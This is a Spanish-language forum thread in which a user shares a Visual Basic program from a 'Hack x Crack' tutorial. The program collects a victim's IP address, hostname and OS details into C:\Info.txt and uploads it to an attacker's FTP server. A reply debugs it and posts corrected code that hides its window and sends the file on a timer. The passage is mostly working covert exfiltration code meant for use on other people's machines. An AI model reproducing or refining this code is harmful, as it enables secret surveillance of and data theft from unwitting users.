Hola e creado un programa ( de hackx crack) que manda la ip,local host name, tipo de s.o, y version del s.o a un servidore ftp en un archivo .txt el unico problema que tengo esque cuando lo sube al servidor ftp lo sube con el nombre del hostname de la victima pero el archivo no contiene informacion ( pesa 0 bytes ) y en mi pc cuando ejecute el programa antes de subirlo crea el archivo de texto ( el mismo que va a subir al ftp ) y lo raro esque ese si posee la informacion y pesa como 25 bytes
aca va el codigo esta en vb obiamente
donde sale lo deben llenar como corresponde para conectarse a un server ftp, obiamente yo no les voy a poner el pass, user y server mios por razones obias asique si ustede lo deben provar con algun server ftp de una pagina web por ejemplo
yo use usuarioss.lyco
s.es

De antemano gracias
PD: Cualquiuer duda esto es el tuto de Hack x Crack 7 "IPHXC ll"
Buen día invisible_soul
. Aquí te dejo el código ya corregido, el problema radicaba en que no especificabas la ruta del archivo Info.txt al utilizar el comando PUT; debes poner "PUT C:\Info.txt"
Te dejo el código.
Agregar 1 control CommandButton, 1 Timer, 1 Winsock, 1 SysInfo, 1 Inet e insertar el siguiente código en un...
Formulario
Dim Ti 'declaramos la variable
Const Ruta = "C:\"
Const Archivo = "Info.txt"
Const ArchivoConRuta = Ruta & Archivo '"C:\Info.txt"
Private Sub Command1_Click()
On Error GoTo Error
Ti = Ti + 1
If Ti = 10 Then
Open (ArchivoConRuta) For Output As #1
Print #1, "IP del Host= ", Winsock1.LocalIP
Print #1, "Nombre Local del Host= ", Winsock1.LocalHostName; ""
Print #1, "Tipo de S.O= ", SysInfo1.OSPlatform
Print #1, "Version del S.O= ", SysInfo1.OSVersion
Print #1, Date
Print #1, Time
Close #1
Inet1.Execute "ftp://TuUsuario:PonTuContraseña@DirecciónFTP", _
"PUT " & ArchivoConRuta & " /CarpetaFTP/" & Archivo '& Winsock1.LocalHostName & ".txt"
Ti = 0
End If
Exit Sub
Error:
End Sub
Private Sub Form_Load()
On Error GoTo Error
Me.Visible = False
Ti = 0
Timer1.Interval = 1000
Exit Sub
Error: